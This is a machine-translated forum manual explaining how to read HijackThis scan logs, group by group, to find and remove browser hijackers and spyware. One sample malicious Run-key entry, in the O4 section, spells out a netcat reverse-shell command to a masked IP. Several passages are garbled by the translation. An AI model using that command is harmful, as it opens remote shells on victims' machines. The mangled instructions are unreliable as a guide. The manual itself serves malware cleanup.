5. Troubleshooting of the system with HijackThis.
Group R0, R1, R2, R3.
In this case, if the URLs listed here have been configured for us there will be no problem and left as it is.
But if these have not been put to us, directions are not very extensive and we know the brand and we Fix Checked.
Good Example:
Code:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page=www.google.com
Bad Example:
Code:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar=res://C:\WINDOWS\TEMP\se.dll/sp.html
NOTE: R2 is no longer used.
Continuing R3:
R3 is the reference used by Search Hook. If you manually enter a URL as a homepage without a protocol (http://, ftp://) You try to find a machine and if you do not succeed, go to URL Search Hook.
Good Example:
R3 - Default URLSearchHook is missing
Bad Example, and to mark 'Fix Checked'
Code:
R3 - URLSearchHook:(no name)-_(CFBFAE00-17A6-11D0-99CB-00C04FD64497)-(no file)
____________________________________________________________________________________________________ ____________________
Group F0, F1, F2, F3.
Here programs are loaded from files *. ini (win.ini, system.ini).
F0: According to the sources that I consulted recommended that if there is a line that starts with F0, mark it and give then Fix Checked.
F1: Programs used by ancient Win 3.1/95/98 which is attached in the win.ini file in the keys Run = and Load =. In this case we must search for information before dialing and giving Fix Checked.
F2 and F3: They are the same as above, but use the NT kernel, I'm talking about Windows NT/2000/XP, not using the same way to the startup files: system.ini and win.ini already named above.
Some examples of reference:
Code:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Code:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=[**]\system32\userinit.exe,[**]\moralla.exe
If, under Win NT is the default: userinit, nddeagnt.exe is normal under that system. But any other executable is highly likely to be spyware and / or trojan.
____________________________________________________________________________________________________ ____________________
Group N1, N2, N3, N4.
URL's home page / search in Netscape / Mozilla.
N1: This refers to the home page and search engine Netscape 4
N2: It refers to the home page and search engine netscape 6
N3: Refers to the home page and search engine Netscape 7.
N4: Corresponds to the home page and search engine of Mozilla Firefox.
Are commonly found in the files: prefs.js.
NOTE:
Currently, the highest percentage of Spyware, Malware, Hijackers are made for IE and not Mozilla, Netscape or Opera, and they remain a bit more unless the IE above.
____________________________________________________________________________________________________ ____________________
O1 group:
Corresponds to the funnel of the Hosts file.
What is the Hosts file?.
The Hosts file, it works as a kind of converter or responsible for establishing the relationship between IP address and hostname.
127.0.0.1 www.google.com
If you try to go to www.google.com, reviewed the hosts file, you will see the entry and make the IP address 127.0.0.1.
In this box, you'll see the default installation paths Hosts file:
If you see entries like those shown above and there is no specific reason for what you know should be there, you can safely delete.
If you see the hosts file is located in C:\Windows\Help\hosts, that means you're infected with CoolWebSearch. If you noticed that the hosts file is not in default path for your operating system then, in the HijackThis scan, the entrance and give Fix Checked or another program to clean up the Hosts file.
If you're not a very advanced user and do not want complicate HijackThis, you can use the host program, which allows you to restore the hosts file to its default configuration on your system.
To do this, download the host program from here: Download Host. Run, once open, click the button "Restore Original Host" and once this is done close the host.
____________________________________________________________________________________________________ ____________________
O2 Group:
This group belongs to the Browser Helper Objects (BHO, Translation, Google).
Real example of BHO:
Code:
BHO: NAV Helper- -C:\Program Files\Norton AntiVirus\NavShExt.dll
To fix these types of entries, we can see a list like this, hosted by Sysinfo. Can be found here: http://sysinfo.org/bholist.php
When we consult the list, we must emphasize the CLSID, which is between the number keys on the list. The CLSID in the list refer to log entries that contain information about the BHO.
Once detected malignant entries shall mark and give it "Fix Checked". But then HijackThis will want to close them instantly and you can not do so, and that will be in use.
In this case what we should do is go into safe mode by pressing F8 before you start your system and delete it manually.
____________________________________________________________________________________________________ ____________________
Group O3:
This group corresponds to the toolbars of Internet Explorer.
These are the famous "Toolbars", which is located below the navigation bar or the context menu of IE.
They are in the following registry key:
Code:
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar
Example:
Code:
Toolbar: Norton AntiVirus - - C:\Program Files\Norton AntiVirus\NavShExt.dll
If these entries are not accepted by you, or do not recognize their names you can consult the list of Sysinfo that is in the former group, to find the entry and see if your system is in or not. If you do not want something on your system, you can delete it with ease, as we did before: Marking the entry and click Fix Checked.
In this group, it is the same as in the previous group. HijackThis will attempt to delete the selected entries but will not be possible to delete some, you have to go into safe mode to delete them manually.
____________________________________________________________________________________________________ ____________________
O4 Group:
In this group, it is up to the programs or applications that start when Windows on our system.
Commonly found in the registry keys and the Startup folders. This is only valid for NT, XP and 2000.
- The keys of the registry, which can accommodate these applications are these:
Code:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
NOTE: HKLM = HKEY_LOCAL_MACHINE-HKCU=HKEY_CURRENT_USER.
There are two folders where you can start the applications:
Startup: C:\Documents and Settings\USERNAME\Start Menu\Programs\Startup -> particular user.
Global: C:\Documents and Settings\All Users\Start Menu\Programs\Startup -> points to all users.
When fixing the O4 entries, HijackThis not delete the files associated with this entry. You must manually delete them, usually by rebooting the machine into safe mode. Tickets Global Startup Startup and work a little differently. HijackThis deletes the shortcuts in these posts, but not the files they point to. If the executable resides in the current directory or Global Startup Startup time will be deleted.
Example of legitimate application:
Code:
HKLM\ ... \Run:[Winamp]"C:\Winamp\winamp.exe"/(can be any argument)
Possible malicious application example:
Code:
HKLM\...\Run:[**]210.xxx nc-vv-e cmd.exe "
You can see some of these lists of legitimate Startups to check your log and see if the applications that start with your system or are true in a worse case: Trojans, spyware or hijackers.
These lists can serve you:
http://www.answersthatwork.com/Taskl...s/tasklist.htm
http://greatis.com/regrun3appdatabase.htm
http://www.sysinfo.org/startuplist.php
____________________________________________________________________________________________________ ____________________
O5 Group:
This group is not able to access the IE settings from the Control Panel.
Adding an entry in the file Control.ini, which by default should be found in "C:\Windows\Control.ini. Modifying this file, we can specify the control panels that do not want to be visible.
Example: File: Control.ini: inet.cpl = no. It hides the options of IE in the Control Panel.
If you log in, find a line like this and not putting yourself or another person you trust or managed by the system, is a sign that a malicious application is trying to block or impede the modification of the options for IE. It may also be restrictions placed by some Anti-Spyware software such as SpyBot or Adware in the latter case you can leave with peace of mind, otherwise you can use HijackThis to fix it.
____________________________________________________________________________________________________ ____________________
O6 Group:
This section corresponds to a restriction by the administrator to make changes in settings or on the homepage of Internet Explorer through certain settings in the registry.
Example: --
Code:
HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions
These options are only blocked if the administrator has done or casual personal use or function is activated to block IE from the options panel "Immunize" antispyware software SpyBot: Search & Destroy.
____________________________________________________________________________________________________ ____________________
Group 07:
This section corresponds to the Regedit can not be executed due to the change of an entry in the register.
Registration Key:
Code:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
Sample List O7 --
Code:
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System:
DisableRegedit=1
NOTE: In some cases, administrators of certain places, such as cyber, businesses or other sites to block access to regedit does not change any settings. But to see this in your system and was not for you, you can use HijackThis to delete it with ease.
____________________________________________________________________________________________________ ____________________
Group 08:
This group is for the extras found objects from the context menu of Internet Explorer.
This means that you'll see the options you normally see when you right-click on any web page you're viewing on your browser.
Code:
Registry key: HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\MenuExt
Sample List O8 --
Code:
Extra context menu item: & Google Search --
res://c:\windows\GoogleToolbar1.dll/cmsearch.html
The listing for these entries show the objects that appear in the contextual menu when you right click, and what program is used when you click on that option. Some, like "Browser Pal" should always be erased, and the rest should be on Google before doing anything. An example of a legitimate program that we could find there would be Google Toolbar.
When you fix these entries, HijackThis not delete the files that are mentioned in the list. It is recommended that you restart in safe mode as in previous cases and delete these files and / or folders from the toolbar above.
____________________________________________________________________________________________________ ____________________
Group 09:
This group corresponds to the buttons we have in the main toolbar of IE or the objects (items) on the Tools menu in IE that are not part of the default installation.
Code:
Registry Key:HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions
Sample Schedule O9 --
Code:
Extra Button: AIM (HKLM)
If you do not need these buttons or menu items or recognized as malwares, you can fix them securely.
The same happens in the previous groups, HijackThis can not delete the files mentioned here, but what you have to reboot and enter safe mode to manually delete the folders and / or malicious files.
____________________________________________________________________________________________________ ____________________
Group 10:
This group corresponds to the Winsock Hijackers, also known as LSP (Layered Service Provider). The LSPs are a way to connect your software to implement a Winsock 2 on your computer. Since the LSPs are chained when the Winsock is used, the data are transported via each LSP in the chain. The spyware and hijackers may use LSPs to see all the traffic that is generated on your Internet connection.
Be careful, when removing these objects, and which if disposed of improperly, you could lose access to the Internet.
Sample Schedule O10 --
Code:
Broken Internet access because of LSP provider 'spsublsp.dll' missing
Many virus scanners begin scanning viruses, trojans, etc.., At the Winsock. The problem is that many do not reorder the LSPs in the correct order after deleting the problematic LSP. This may cause a problem and see HijackThis display a warning, which may be similar to the example above, although the Internet is still working. You should consult an expert when you fix these errors. You can also use LSPFix fix.
The SpyBot usually can fix it but make sure you have the latest version, as the old problems.
If you're not a very advanced user with a tool you can use HijackThis to fix these errors call LSPFix (Download).
____________________________________________________________________________________________________ ____________________
Group 11:
This group is a group of non-default options that have been added in the Advanced tab of Internet Options in Internet Explorer.
If you search for the tools menu>> Internet Options you will see the Advanced tab. You may see there a new set of options by adding an entry under a registry key.
Code:
Registry Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions
Sample Schedule O11 --
Code:
Options group: [CommonName] CommonName
We pulled out the manual I read, I quote: "According to Merijn, the creator of HijackThis (and also CWShredder, StartupList, etc..) Only knows of the existence of a hijacker who uses it and is CommonName. If CommonName look at the list, you can safely remove it. If you see another entrance you should use Google to research a little. "
____________________________________________________________________________________________________ ____________________
Group 12:
This group corresponds to the Plug-ins or addons for Internet Explorer. Plug-ins or addons are pieces of software that is loaded when Internet Explorer starts, to add functionality to the browser. There are many legitimate plug-ins available and also illegitimate as the display of PDF files (legitimate).
Code:
Registry key:HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\plugins
Code:
Sample Schedule 012: Plugin for.PDF: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll
Many of the plug-ins are legitimate, so you should investigate Google, before finding erased.
One of the most popular plug-ins is the illegitimate Onflow, which has a. OFB.
When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use even if Internet Explorer is closed. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group 13:
This group corresponds to a prefix of the hijacker's default Internet Explorer. The prefix is a default setting in Windows that specifies how URLs that you type without pretend http://, ftp://, etc. they are managed. By default Windows add http:// at the beginning, as the default prefix. You can change this prefix by default one of your choice by editing the registry. The hijacker known as CoolWebSearch do this by changing the default prefix http://ehttp.cc/?. That means that when you connect to a URL, www.google.com, actually going to http://ehttp.cc/?www.google.com, which is actually the website for CoolWebSearch .
Code:
Registration Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix\
If you are experiencing problems similar to the problem above, you should run CWShredder. This program removes all known variations of CoolWebSearch that may be in your machine.
If CWShredder does not find or fix the problem, then you can use HijackThis to fix this entry if found.
____________________________________________________________________________________________________ ____________________
Group 014
This group is for the hijacker of the "Reset Web Settings" (the Reset Web Settings). There is a file on your computer using IE (Internet Explorer) when you reset the options that came by default. This file is saved by default in C:\Windows\inf\iereset.inf and contains all the default settings to be used. When you reset a configuration file to read and change the settings that are in the file. If a hijacker changes the information in that file, then you'll be reset when re-configurations, for reading the information incorrectly iereset.inf file.
In conclusion, if you see such an entry in your log, does not always mean it is bad. Can be made for you, a computer administrator, you must stop if and when, you know the address of the file. Conversely, if the unknown, you can mark it and give Fix Checked.
____________________________________________________________________________________________________ ____________________
Group O15.
This group corresponds to unwanted sites in the trusted sites zone of IE. The security of Internet Explorer is based on a number of areas. Each zone has a different level of security in terms of scripts and applications that can run while you are using that area. You can add domains to particular areas, so if you're navigating in a domain that is part of an area of low security, then allow to run scripts, some potentially dangerous, in a website.
Code:
Registry key:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
So if we know any input source or your URL, we will mark it and give Fix Checked.
____________________________________________________________________________________________________ ____________________
Group O16.
This group is for ActiveX objects, also known as "Downloaded Program Files (Downloaded Program Files).
ActiveX objects are programs that are downloaded from websites are stored on your computer. These objects are stored by default in: C: \ windows \ Downloaded Program Files. They have a reference in the registration for its CLSID which is a long string of numbers in braces (). There are many legitimate ActiveX controls such as this example, which is an iPIX viewer.
Activex or for playing a game online.
Many are legitimate, but so are to be used with other intentions.
If you see names or addresses that do not recognize, you should search Google to see whether they are legitimate. If you confirm that they are illegitimate, you can fix them. Removing ActiveX objects on your computer, you will not have big problem to download it again when you enter back into the site where the downloads.
As we said above, not all Activex, are illegitimate. Many of these are used by authorized websites that allow access to certain functions that are not permitted without the ActiveX object.
For example:
Any AV online as Eset, Kaspersky need to run an Activex and view the contents of your files so that we can analyze.
When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use even if Internet Explorer is closed. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O17.
This group is for the domain Lop.com.
When we turn to a website using a domain such as www.hotmail.com, instead of an IP address, your computer uses a DNS server to translate domain name into an IP address like 200.56.15.85. The domain hack happens when the hijacker changes the DNS servers on your machine to be able to point your DNS to where they want to be able dirijirte anywhere they want. Adding www.hotmail.com their DNS servers, they can do that when you go to www.hotmail.com, you redirect to the site of your choice, for example, a site to download more malware to your computer or infect you with a trojan .
Code:
Sample List O17 - HKLM\System\CS1\Services\VxD\MSTCP:NameServer=69.57.146.14,69.57.147.175
If you see entries of this type and do not recognize the domain belonging to your ISP or company that gives you Internet access, and DNS servers do not belong to your ISP or company, then you should use HijackThis to fix this.
Otherwise, you could do a Whois on the IP address to see which company they belong.
____________________________________________________________________________________________________ ____________________
Group O18.
This group is for the extra protocols and protocol hijackers.
This method is used to change the standard protocol drivers that your computer uses to provide the hijacker. This allows the hijacker to take control of certain channels on your computer sends and receives information.
Code:
Registry Keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter
HijackThis first read the register of protocols for non-standard protocols. When a sample is the CLSID for more information and the file path.
Code:
Sample List O18 - Protocol: relatedlinks - - C:\PROGRA~1\COMMON~1\MSIETS\msielink.dll
Most who do this are common CoolWebSearch, Related Links, and Lop.com. If you see these names you can fix it using HijackThis.
Use Google to see if the files are legitimate. You can also use the List of O18 CASTLECOPS support to verify the files.
When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use even if Internet Explorer is closed. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O19.
This group is for the hijacker of the user's style sheets.
A stylesheet is a template for how to display the layers, colors and fonts that are displayed in an HTML page. This type of hijacking overrides the default style sheet, which was designed to help users, and causes large amounts of pop-ups (advertising pop-ups) or SPAM to cause, annoyance or a slow potential.
Code:
Keys in the registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\:User Stylesheets
Code:
Sample List O19 - User style sheet: c:\WINDOWS\Java\my.css
In general, these entries can be repaired without major problems with HijackThis.
When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use even if Internet Explorer is closed. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O20.
This group is for files that are loaded via the AppInit_DLLs registry value.
AppInitDLLs the registry value contains a list of dlls (libraries) to be loaded when it is loading user32.dll. Many Windows executables use the user32.dll library, which means that any DLL that is listed in the AppInit_DLLs registry key will also be charged. This makes it very difficult to remove because the DLL is loaded with many processes, many of which can not be stopped without causing system instability. User32.dll file is also used in processes that start automatically by the system when you logueas. This means that the files loaded in the AppInit_DLLs value will be loaded near the beginning in the Windows startup routine allowing the DLL to hide or protect itself before we have access to the system.
This method is known to be used by a variant of CoolWebSearch and can only be seen in Regedit by right clicking on the value and selecting Modify binary data. Registrar Lite, on the other hand, can more easily see this DLL.
Code:
Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
Code:
Sample List O20 - AppInit_DLLs: C:\WINDOWS\System32\winifhi.dll
There are very few legitimate programs that use this registry key, but you must proceed with caution when deciding to delete the files that are listed here. Use Google or a list (List of Startups Bleeping Computer) as a support to investigate whether the files are legitimate or not.
When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O21.
This group is for files that are loaded through the ShellServiceObjectDelayLoad registry key.
This key contains values similar to the Run registry key. The difference is that instead of pointing to the same file, it points to the CLSID InProcServer, which contains information about the particular DLL that is being used.
Files under this key are loaded automatically by Explorer.exe when your computer starts. Because Explorer.exe is the shell for your computer, it always will be loaded, so loading the files under this key. These files are therefore loaded early in the startup process that occurs before any human intervention.
A hijacker who uses the method can be recognized by the following entries:
Code:
Sample List: R0 - HKCU\Software\Microsoft\Internet Explorer\Main, Start Page = C:\WINDOWS\secure.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main, Default_Page_URL=C:\WINDOWS\secure.html
Code:
Registry key: HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ ShellServiceObjectDelayLoad
Code:
Sample List O21 - SSODL: System - - C: \ WINDOWS \ system32 \ system32.dll
HijackThis is an internal database that recognizes the legitimate uses and not in the log list, So, you see any entry O21 and may consider suspicious.
You can use Google to check on this DLL or DLL's from this list:
List of DLL's group O21 of Bleeping Computer.
When you fix these entries with HijackThis, HijackThis will want to delete the file list. Sometimes the file may be in use. Yes, the file still is not removed, you must enter in safe mode and remove it manually.
____________________________________________________________________________________________________ ____________________
Group O22.
This group is for files that are loaded through the SharedTaskScheduler registry value.
Entries in this registry run automatically when Windows starts. To date only CWS.Smartfinder using this key.
Registration Key:
Code:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
Code:
Sample List O22 - SharedTaskScheduler: (no name) - - c:\windows\system32\mtwirl32.dll
HijackThis deletes the value associated with this SharedTaskScheduler's entry, but not erase that it points to the CLSID or the file that points to the CLSID InprocServer32. Therefore, as in previous groups, we must enter in safe mode and delete it manually using Unlocker or other similar program.
Here ends the manual, I hope that fits all.
Any suggestion is more than welcome!.
Bookmarks